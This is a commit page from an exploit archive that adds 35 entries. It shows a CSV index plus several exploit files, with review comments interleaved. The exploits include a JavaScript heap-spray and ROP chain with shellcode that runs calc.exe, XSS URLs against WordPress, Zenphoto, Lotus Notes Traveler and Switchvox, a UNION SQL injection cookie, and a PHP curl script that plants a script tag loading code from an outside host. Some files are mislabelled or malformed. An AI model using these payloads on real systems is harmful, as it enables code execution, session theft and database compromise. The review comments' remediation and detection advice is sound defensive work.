This repository has been archived by the owner on Nov 28, 2022. It is now read-only.

Commit
DB: 2015-08-22
35 new exploits
Offensive Security committed Aug 22, 2015
1 parent 6dccd55 commit 40a9571
Showing 36 changed files with 2,207 additions and 0 deletions.
35 changes: 35 additions & 0 deletions files.csv
@@ -34210,3 +34210,38 @@ id,file,description,date,author,platform,type,port
37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,"_ Un_N0n _",windows,dos,21
37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
37895,platforms/win64/shellcode/37895.asm,"Win2003 x64 - Token Stealing shellcode - 59 bytes",2015-08-20,"Fitzl Csaba",win64,shellcode,0
37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin 'id' Parameter Cross Site Scripting Vulnerability",2012-09-26,"Scott Herbert",php,webapps,0
37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 Denial of Service Vulnerability",2012-09-27,"Ryuzaki Lawlet",linux,dos,0
37898,platforms/windows/local/37898.py,"Reaver Pro Local Privilege Escalation Vulnerability",2012-09-30,infodox,windows,local,0
37899,platforms/php/webapps/37899.txt,"Switchvox Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0
37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0
37901,platforms/php/webapps/37901.txt,"AlamFifa CMS 'user_name_cookie' Parameter SQL Injection Vulnerability",2012-09-30,L0n3ly-H34rT,php,webapps,0
37902,platforms/php/webapps/37902.php,"WordPress Akismet Plugin Multiple Cross Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps,0
37903,platforms/php/webapps/37903.txt,"Zenphoto 'admin-news-articles.php' Cross Site Scripting Vulnerability",2012-10-02,"Scott Herbert",php,webapps,0
37904,platforms/php/webapps/37904.txt,"Omnistar Mailer Multiple SQL Injection and HTML Injection Vulnerabilities",2012-10-01,"Vulnerability Laboratory",php,webapps,0
37905,platforms/windows/dos/37905.rb,"PowerTCP WebServer for ActiveX Denial of Service Vulnerability",2012-09-28,catatonicprime,windows,dos,0
37907,platforms/php/webapps/37907.txt,"WordPress MDC Private Message Plugin 1.0.0 - Persistent XSS",2015-08-21,"Chris Kellum",php,webapps,80
37909,platforms/windows/dos/37909.txt,"Microsoft Office 2007 wwlib.dll fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos,0
37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 wwlib.dll Type Confusion",2015-08-21,"Google Security Research",windows,dos,0
37911,platforms/windows/dos/37911.txt,"Microsoft Office 2007 OGL.dll DpOutputSpanStretch::OutputSpan Out of Bounds Write",2015-08-21,"Google Security Research",windows,dos,0
37912,platforms/windows/dos/37912.txt,"Microsoft Office 2007 MSO.dll Arbitrary Free",2015-08-21,"Google Security Research",windows,dos,0
37913,platforms/windows/dos/37913.txt,"Microsoft Office 2007 MSO.dll Use-After-Free",2015-08-21,"Google Security Research",windows,dos,0
37914,platforms/windows/dos/37914.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write",2015-08-21,"Google Security Research",windows,dos,0
37915,platforms/windows/dos/37915.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37916,platforms/windows/dos/37916.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0
37917,platforms/windows/dos/37917.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0
37918,platforms/windows/dos/37918.txt,"Windows win32k.sys TTF Font Processing win32k!scl_ApplyTranslation Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0
37919,platforms/windows/dos/37919.txt,"Windows win32k.sys TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0
37920,platforms/windows/dos/37920.txt,"Windows ATMFD.DLL Write to Uninitialized Address Due to Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0
37921,platforms/windows/dos/37921.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37922,platforms/windows/dos/37922.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37923,platforms/windows/dos/37923.txt,"Windows ATMFD.DLL CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0
37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 MSPTLS Heap Index Integer Underflow",2015-08-21,"Google Security Research",windows,dos,0
37925,platforms/windows/local/37925.txt,"Mozilla Maintenance Service Log File Overwrite Elevation of Privilege",2015-08-21,"Google Security Research",windows,local,0
37926,platforms/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
37927,platforms/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
37928,platforms/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
37929,platforms/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass Issue",2015-08-21,"Anastasios Monachos",php,webapps,0
37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload And Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
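Review bot: the port column is inconsistent across the php/webapps rows in this hunk: the 37907 row (WordPress MDC Private Message) carries 80, as the pre-existing 37894 row does, while every other webapps row added here (37896 through 37904 and 37926 through 37932) carries 0. Either 80 or 0 should be used for all of them. Two title points: the 37930 description reads "Arbitrary File Upload And Execution" while 37932 reads "Arbitrary File Upload and Execution", and the 37900 title says "8.5.1.x" although the 37900.txt file in this same commit states "8.5.3 and prior are vulnerable". Ids 37906 and 37908 are also absent from the sequence (37905, 37907, 37909); if they were withheld on purpose, nothing in the commit message ("35 new exploits") records it, and a short note would help anyone reconciling this CSV against the platforms/ tree.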
132 changes: 132 additions & 0 deletions platforms/linux/dos/37897.html
@@ -0,0 +1,132 @@
source: http://www.securityfocus.com/bid/55709/info

The Midori Browser is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

Midori Browser 0.3.2 is vulnerable; other versions may also be affected.


it****************************

<html>
<!-- ROP completed--->
<head>
<Title>Ubuntu 11.10 Calc p47l0d -- Rop Completed</title>
<script type="text/javascript">
function ignite() {
var carpet = 0x200;
var vftable = unescape("\x00% u0c10");
var pLand = "% u00fd% u0c10";
var pShell = "% u0000% u0c10";
var oldProt = "% u0000% u0c10";

var heap = unescape("% u0101% u0102"
+"% u0008% u0c10"
+"% u0105% u0106"
+"% u10c2% u7c34"//"% u0107% u0108" pop ecx;pop ecx;ret
+"% u0109% u010a"//
+"% u3134% u6d32"//"% u010b% u010c"//"% u6643% u6d6a" // mov eax,[esi]
+"% u787f% u6d32"//"% u010d% u010e"// xchg eax,esi;aam 0ff;dec ecx;ret
+"% u7b72% u6d83"//"% u010f% u0111" // pop edx;ret
+"% u0000% u0c10"//% u0112% u0113" // will be popped in edx //
+"% u2a30% u6d7f"//"% u0114% u0115" // mov ecx,esi;call [edx+50]
+pLand//"% u0116% u0117" // Address in shellcode to land change it accordingly
+"% ue8d4% u6d7f"//"% u0118% u0119" // mov [ecx],eax;pop ebp;ret
+"% u011a% u011b"// will be popped in ebp
+"% u1b02% u7c34"//"% u011c% u011d" // dec ecx;ret
+"% u1b02% u7c34"//"% u011e% u011f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0120% u0121" // dec ecx;ret
+"% u1b02% u7c34"//"% u0122% u0123" // dec ecx;ret
+"% u4edc% u7c34"//"% u0122% u0123" // pop eax;ret
+oldProt//"% u0124% u0125" // pOldProtection
+"% ue8d4% u6d7f"//"% u0126% u0127" // mov [ecx],eax;pop ebp;ret
+"% u4edb% u7c34"//"% u0128% u0129" // pop ebx;pop eax;ret // needed in initial phase.
+"% u1b02% u7c34"//"% u012a% u012b" // dec ecx;ret
+"% u1b02% u7c34"//"% u012c% u012d" // dec ecx;ret
+"% u4edb% u7c34"//"% u012e% u012f" // pop ebx;pop eax;ret
+"% u2643% u7c34"//"% u0130% u0131" // xchg eax,esp;pop edi;add byte ptr ds:[eax],al;pop ecx,ret
+"% u0040% u0000"//"% u0132% u0133" // newProptection = PAGE_READ_WRITE_EXECUTE
+"% u1b02% u7c34"//"% u0134% u0135" // dec ecx;ret
+"% u1b02% u7c34"//"% u0136% u0137" // dec ecx;ret
+"% ue8d4% u6d7f"//"% u0138% u0139" // mov [ecx],eax;pop ebp;ret
+"% u013a% u013b"// will be popped in ebp
+"% u1b02% u7c34"//"% u013c% u013d" // dec ecx;ret
+"% u1b02% u7c34"//"% u013e% u013f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0140% u0141" // dec ecx;ret
+"% u1b02% u7c34"//"% u0142% u0143" // dec ecx;ret

+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret
+"% u0000% u0010"//"% u0146% u0147" // Size
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret
+"% u014a% u014b"// Will be popped in ebp.
+"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret

+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret
+pShell//"% u0146% u0147" // Address Of Shellcode block to change protection.
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret
+"% u014a% u014b"// Will be popped in ebp.
/* +"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret
*/ +"% u4cc1% u7c34"//"% u0154% u0155" // pop eax;ret
+"% u9611% u7c34"//"% u0156% u0157" // will be popped in eax. pop edi;pop ebx;pop ebp;ret
+"% u347a% u7c34"//"% u0158% u0159" // push esi;push edi;call eax
+"% u4edc% u7c34"//"% u015a% u015b" // pop eax;ret
+"% u00e0% u0c10"//"% u015c% u015d" // will be popped in eax.

/* Need to fix the ebp for proper landing on shellcode */
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret


+"% u1f0a% u7c34"//"% u015e% u015f" // mov esp,ecx;mov ecx[eax];mov eax,[eax+4];push eax;ret
+"% u0160% u0161"
+"% u28dd% u7c35"//"% u0162% u0163" // VirtualProtect
+"% u0164% u0165"
+"% u0166% u0167"
+"% u0168% u0169"
+"% u016a% u016b"
+"% u016c% u016d"
)
/* Shellcode : */ +unescape("% u9090% u9090% u9090% u9090"
+"% u585b" // pop ebx;pop eax;
+"% u0a05% u0a13% u9000" // add eax,0a130a
+"% u008b" // mov eax,[eax]
+"% u056a" // push 05
+"% uc581% u0128% u0000" // add ebp,114
+"% u9055" // push ebp;nop
+"% u1505% u04d6% u9000" // add eax,4d615
+"% ud0ff" // call eax
+"% uBBBB% uCCCC% uDDDD% uEEEE"
/* command: */ +"% u6163% u636c% u652e% u6578% u0000% ucccc" // calc.exe
);
var vtable = unescape("\x04% u0c10");
while(vtable.length < 0x10000) {vtable += vtable;}
var heapblock = heap+vtable.substring(0,0x10000/2-heap.length*2);
while (heapblock.length<0x80000) {heapblock += heap+heapblock;}
var finalspray = heapblock.substring(0,0x80000 - heap.length - 0x24/2 - 0x4/2 - 0x2/2);
var spray = new Array();
for (var iter=0;iter<carpet;iter++){
spray[iter] = finalspray+heap;
}
/* vulnerability trigger : */
var arrobject = [0x444444444444];
for(;true;){(arrobject[0])++;}
}
</script>
</head>
<body>
<applet src="test.class" width=10 height=10></applet>
<input type=button value="Object++" onclick="ignite()" />
</body>
</html>

********************Exploit****************************

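Review bot: the body of this file does not match its classification. The header describes a Midori Browser 0.3.2 denial of service and files.csv places it under platforms/linux/dos, yet the page `<title>` reads "Ubuntu 11.10 Calc p47l0d -- Rop Completed" and the heap block comments reference `VirtualProtect`, `PAGE_READ_WRITE_EXECUTE` and `calc.exe`, which exist only on Windows. The only part of `ignite()` that relates to the described crash is the section marked `/* vulnerability trigger : */`, i.e. `var arrobject = [0x444444444444];` followed by `for(;true;){(arrobject[0])++;}`; the spray and gadget material above it is inert on the stated target and should either be dropped or introduced by a comment explaining why it was kept, so that someone building a crash regression test for the browser can see at a glance that the unbounded increment is the trigger. Smaller points: the separator just before `<html>` is garbled to `it****************************` where the closing one reads `********************Exploit****************************`, and `<applet src="test.class">` references a class file that is not part of this commit.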
13 changes: 13 additions & 0 deletions platforms/multiple/remote/37900.txt
@@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/55740/info

IBM Lotus Notes Traveler is prone to a URI-redirection vulnerability, multiple HTML-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user and conduct phishing attacks. Other attacks are also possible.

IBM Lotus Notes Traveler 8.5.3 and prior are vulnerable; other versions may also be affected.

http://www.example.com/servlet/traveler?deviceType=700&redirectURL=javascript:alert(document.cookie)

http://www.example.com/servlet/traveler?deviceType=700&redirectURL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://www.example.com/servlet/traveler?deviceType=700&redirectURL=http://websecurity.com.ua
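Review bot: the version statement "IBM Lotus Notes Traveler 8.5.3 and prior are vulnerable" disagrees with the files.csv row for 37900, which titles the entry "8.5.1.x"; one of the two should be corrected. The three URLs show `redirectURL` being accepted as a `javascript:` URL, a `data:text/html;base64` URL and an off-site `http://` URL, which is the useful detail for a defender: the fix is to restrict `redirectURL` to relative paths or an allowlist of same-origin targets and reject any scheme other than http or https, and the matching detection is a search of access logs for `redirectURL=` values beginning with `javascript:` or `data:`. The text also promises "multiple HTML-injection vulnerabilities" but every PoC exercises the same redirect parameter, so the entry should say whether the injection points are this parameter or are simply not documented here.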
9 changes: 9 additions & 0 deletions platforms/php/webapps/37896.txt
@@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55689/info

The ABC Test plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

ABC Test 0.1 is vulnerable; other versions may also be affected.

http://www.example.com/blog/wp-admin/admin.php?page=abctest&do=edit&id=%22%3E%3Ch1 %3EXSS%3C/h1
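Review bot: the PoC URL on the last line is malformed: there is a space inside `%3Ch1 %3EXSS` and the closing tag is cut to `%3C/h1` with no final `%3E`, so as written it does not reproduce the payload the description implies. The endpoint is `wp-admin/admin.php?page=abctest&do=edit`, which sits behind the WordPress admin login, so the text should state that the target user must already be authenticated for the reflected `id` value to reach a browser; that precondition changes the severity and is missing both here and from the files.csv title for 37896, which also omits the "0.1" version given in this file.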
25 changes: 25 additions & 0 deletions platforms/php/webapps/37899.txt
@@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/55739/info

Switchvox is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

Switchvox 5.1.2 vulnerable; other versions may also be affected.

Review: Tools -> Sound Manager -> Create sound [Description]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>

Review: Tools -> SugarCRM switchboard Panel -> setup [SugarCRM Web URL] [SugarCRM SOAP URL]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>

Review: Setup -> Groups -> Create Extension Group [Note]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>

Review: Setup -> Outgoing calls -> Create Outgoing Call rule [Note]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>

Review: Setup -> Incoming Calls -> Caller DID routes -> Create Single DID Route [Note]
PoC:<iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>

Review: Setup -> Incoming Calls -> Caller ID Rules -> Create Call transfer Call [Note]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>
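Review bot: all six "Review:" locations are under Tools or Setup, i.e. the administrative UI, and the text never says so; a sentence stating that an administrative session is needed to save the payload, and that it fires when another administrator views the stored Description or Note field, would make the stored nature of the issue explicit (the header says "HTML-injection" but the word stored appears nowhere). Style points: "Switchvox 5.1.2 vulnerable" is missing "is", and the `PoC:` prefix on the Create Single DID Route entry lacks the space the other five have. The remediation is the same for every field listed: HTML-encode the Description and Note values on output rather than trying to filter `<iframe>` on input.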
9 changes: 9 additions & 0 deletions platforms/php/webapps/37901.txt
@@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55746/info

AlamFifa CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

AlamFifa CMS 1.0 Beta is vulnerable; other versions may also be affected.

user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#;
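Review bot: the vector here is a cookie value, `user_name_cookie=...`, not a query or form parameter, and the entry names no script or page that reads that cookie; adding the affected file would let a maintainer verify the fix and let a defender know which requests to inspect. The cookie origin matters: input validation and WAF rules that only look at GET/POST parameters will not see this payload, and the fix is a parameterised query (or at minimum type-casting and escaping) applied to the cookie value before it reaches SQL. For detection, a `UNION ALL SELECT` with literal `93` filler columns, hex-encoded marker strings inside `CONCAT(...)` and a trailing `#` comment terminator in a Cookie header is a distinctive signature.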
37 changes: 37 additions & 0 deletions platforms/php/webapps/37902.php
@@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/55749/info

The Akismet plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

#!/usr/bin/php -f
<?php
#
# legacy.php curl exploit
#

//
// HTTP POST,
//

$target = $argv[1];

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL,
"http://$target/wp-content/plugins/akismet/legacy.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"s=%2522%253E%253Cscript%2520src%253d%2F%2Fsantanafest.com.br%2Fenquete%2Fc%253E%253C%2Fscript%253E");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;
?>
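Review bot: `$argv[1]` is used without a check, so invoking the script with no argument sends a request to `http://` followed by the path and produces an uninformative curl failure; a usage line and an `exit` when `$argc < 2` would fix that. The user-agent string literal is broken across two source lines ("... MSIE" / "5.01; Windows NT 5.0)"), which embeds a newline in the header value and should be joined onto one line. The `s=` payload is double URL-encoded (`%2522%253E%253Cscript` decodes once to `%22%3E%3Cscript`), which deserves a sentence in the header comment because it is the detail a defender needs: a filter that decodes the request once sees only encoded text while the reflected output is decoded again. The payload also loads a script from `santanafest.com.br`, a third-party host the reader does not control; a PoC should point at an inert marker instead. Finally, unlike the other entries in this commit, the text gives no affected version, and the files.csv title for 37902 omits one as well.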
9 changes: 9 additions & 0 deletions platforms/php/webapps/37903.txt
@@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55755/info

Zenphoto is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Zenphoto 1.4.3.2 is vulnerable; prior versions may also be affected.

http://www.example.com/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C>
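Review bot: the PoC URL ends with a stray `%3C>` after `%3C/script%3E`, which looks like a copy artifact and should be removed, and the alert text reads "Cookie sealing Javascript" where "stealing" is presumably meant. The `date` parameter is read by `zp-core/zp-extensions/zenpage/admin-news-articles.php`, an admin-side page, so the entry should state whether an authenticated Zenphoto administrator session is required for the reflection to be reachable; that precondition is missing here just as it is in the WordPress admin entries in this commit. The fix is output encoding of `date` (htmlspecialchars with ENT_QUOTES) before it is written into the page.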
